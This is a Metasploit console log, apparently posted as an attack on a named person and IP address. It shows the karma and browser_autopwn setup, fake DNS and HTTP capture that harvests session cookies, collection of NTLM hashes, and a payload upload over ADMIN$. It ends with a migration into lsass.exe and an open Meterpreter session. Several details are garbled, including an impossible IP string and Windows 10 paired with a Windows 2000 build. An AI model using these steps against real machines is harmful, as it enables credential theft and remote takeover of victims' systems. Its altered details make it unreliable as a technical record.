- Exploit lemodeurdu92 / 81.56.17.144 By Fame with metasploit
- root@kalifame:~# msfconsole -r karma.rc
- =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
- + -- --=[ 2 exploits - 46 payloads
- + -- --=[ 12 encoders - 3 nops
- =[ 49 aux
- resource> load db_JtebaiseMrJeuxMod
- [-]
- [-] The functionality previously provided by this plugin has been
- [-] integrated into the core command set. Use the new 'db_driver'
- [-] command to use a database driver other than sqlite3 (which
- [-] is now the default). All of the old commands are the same.
- [-]
- [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
- resource> db_create /root/Jtebaisefame#never.db
- [*] Creating a new database instance...
- [*] Successfully connected to the database
- [*] File: /root/Jtebaisefame#never.db
- resource> use auxiliary/server/browser_autopwn
- resource> setg AUTOPWN_HOST 10.0.0.1
- AUTOPWN_HOST => 10.0.0.1
- resource> setg AUTOPWN_PORT 55550
- AUTOPWN_PORT => 55550
- resource> setg AUTOPWN_URI /ads
- AUTOPWN_URI => /ads
- resource> set LHOST 10.0.0.1
- ...snip...
- [*] Using URL: http://0.0.0.0:55550/hzr8QG95C
- [*] Local IP: http://92.155.192.243.9953/hzr8QG95C
- [*] Server started.
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Server started.
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Server started.
- msf auxiliary(http) >
- msf auxiliary(http) >
- [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
- [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
- [*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
- [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
- [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
- [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
- [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
- ...snip...
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] Request '/ads' from 10.0.0.100:1278
- [*] Recording detection from User-Agent
- [*] DNS 10.0.0.100:1292 XID 96 (IN:Fameofficiel@gmail.com:A gmail.google.com)
- [*] Browser claims to be MSIE 5.01, running on Windows 2000
- [*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
- [*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
- ...snip...
- [*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
- [*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
- [*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
- [*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 10 LM:Windows 10
- ...snip...
- [*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
- [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
- [*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] AUTHENTICATED as TARGETP0WN3D...
- [*] Connecting to the ADMIN$ share...
- [*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Regenerating the payload...
- [*] Uploading payload...
- [*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Created UxsjordQ.exe...
- [*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Connecting to the Service Control Manager...
- [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Obtaining a service manager handle...
- [*] Creating a new service...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting UxsjordQ.exe...
- [*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
- [*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 10 2195 LM:Windows 10 5.0
- [*] Sending Access Denied to 10.0.0.100:1362
- [*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
- [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
- [*] AUTHENTICATED as TARGETP0WN3D...
- [*] Ignoring request from 10.0.0.100, attack already in progress.
- [*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
- [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
- [*] Sending stage (2650 bytes)
- [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
- [*] HTTP REQUEST 10.0.0.100 > www.youtube.com:80 GET / Windows IE 5.01 cookies=
- [*] Sleeping before handling stage...
- [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
- [*] Uploading DLL (75787 bytes)...
- [*] Upload completed.
- [*] Migrating to lsass.exe...
- [*] Current server process: rundll32.exe (848)
- [*] New server process: lsass.exe (232)
- [*] Meterpreter session 1 opened (10.0.0.1:45017 -> 92.155.192.243.9953)
- msf auxiliary(http) > sessions -l
- Active sessions
- ===============
- Id Description Tunnel
- -- ----------- ------
- 1 Meterpreter 10.0.0.1:45017 -> 92.155.192.243.9953 ESTABLISHED